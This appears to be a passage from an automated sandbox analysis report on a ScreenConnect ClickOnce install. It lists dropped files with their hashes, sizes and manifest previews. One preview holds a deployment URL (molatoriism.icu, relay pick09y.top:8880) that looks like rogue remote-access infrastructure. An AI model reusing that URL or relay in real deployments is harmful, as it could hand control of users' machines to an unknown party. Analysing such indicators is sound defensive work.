                                                                                                                                                                              SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):847
                                                                                                                                                                              Entropy (8bit):5.345615485833535
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                              MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                              SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                              SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                              SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (607), with CRLF line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):14704
                                                                                                                                                                              Entropy (8bit):3.804091917782712
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:t6BKnBqdl2CE+Lpn15UBBaOy0l+Bqdl2CE+LpnkLKZ/p8mkhkBqdl2CE+LpnpoCA:tFx+FnrUafFx+Fn6q/Fx+FnJnLEv
                                                                                                                                                                              MD5:AA9216C36FC0CB3CD3A0FB75E965F2C2
                                                                                                                                                                              SHA1:F41E2DCE753CE932A20ECB67716AB7492AABFB2F
                                                                                                                                                                              SHA-256:546403423DE5CA21D44E671AA6EABA93AF272FBEDBF15C814EC58E8CEBD0F18D
                                                                                                                                                                              SHA-512:717D1857949B12AC6145DE66D5C93611876BE395DD95D9068B61D4B76BF45EF6E22C341E3FD01E7D3294033E0BD7F532F378BC35969806164A647D90DC17F364
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:PLATFORM VERSION INFO.. Windows : 10.0.19045.0 (Win32NT).. Common Language Runtime : 4.0.30319.42000.. System.Deployment.dll : 4.8.4270.0 built by: NET48REL1LAST_C.. clr.dll : 4.8.4515.0 built by: NET48REL1LAST_C.. dfdll.dll : 4.8.4270.0 built by: NET48REL1LAST_C.. dfshim.dll : 10.0.19041.30000 (WinBuild.160101.0800)....SOURCES.. Deployment url : https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):197120
                                                                                                                                                                              Entropy (8bit):6.58476728626163
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                              MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                              SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                              SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                              SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1041
                                                                                                                                                                              Entropy (8bit):5.147328807370198
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                              MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                              SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                              SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                              SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):68096
                                                                                                                                                                              Entropy (8bit):6.068776675019683
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                              MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                              SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                              SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                              SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1636
                                                                                                                                                                              Entropy (8bit):5.084538887646832
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                              MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                              SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                              SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                              SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):95520
                                                                                                                                                                              Entropy (8bit):6.505346220942731
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                              MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                              SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                              SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                              SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):548864
                                                                                                                                                                              Entropy (8bit):6.031251664661689
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                              MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                              SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                              SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                              SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                              Entropy (8bit):5.1303806593325705
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                              MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                              SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                              SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                              SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1721856
                                                                                                                                                                              Entropy (8bit):6.639136400085158
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                              MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                              SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                              SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                              SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1982
                                                                                                                                                                              Entropy (8bit):5.057585371364542
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                              MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                              SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                              SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                              SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61216
                                                                                                                                                                              Entropy (8bit):6.31175789874945
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                              MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                              SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                              SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                              SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):601376
                                                                                                                                                                              Entropy (8bit):6.185921191564225
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                              MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                              SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                              SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                              SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2573
                                                                                                                                                                              Entropy (8bit):5.026361555169168
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                              MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                              SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                              SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                              SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17866
                                                                                                                                                                              Entropy (8bit):5.954687824833028
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                              MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                              SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                              SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                              SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):81696
                                                                                                                                                                              Entropy (8bit):5.862223562830496
                                                                                                                                                                              Encrypted:false
